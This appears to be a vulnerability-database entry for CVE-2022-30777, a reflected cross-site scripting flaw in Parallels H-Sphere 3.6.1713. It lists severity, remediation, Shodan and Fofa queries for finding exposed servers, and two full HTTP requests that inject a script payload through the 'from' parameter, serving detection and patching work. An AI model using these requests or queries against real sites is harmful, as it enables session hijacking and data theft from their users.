🔙 목록으로 돌아가기

CVE-2022-30777: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting

TitleParallels H-Sphere 3.6.1713 - Cross-Site Scripting
Author3th1c_yuk1
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationApply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.
CVSS Score6.1
EPSS Score0.04147
CVE IDCVE-2022-30777
CWE IDCWE-79
Shodan Querytitle:"h-sphere"http.title:"h-sphere"http.title:"parallels h-sphere"
Fofa Querytitle="h-sphere"title="parallels h-sphere"
Tags cve cve2022 parallels hsphere xss vuln

🔍 Vulnerability Description

Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php ‘from’ parameter.

🌐 HTTP Request

GET /index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-30777.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-30777.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A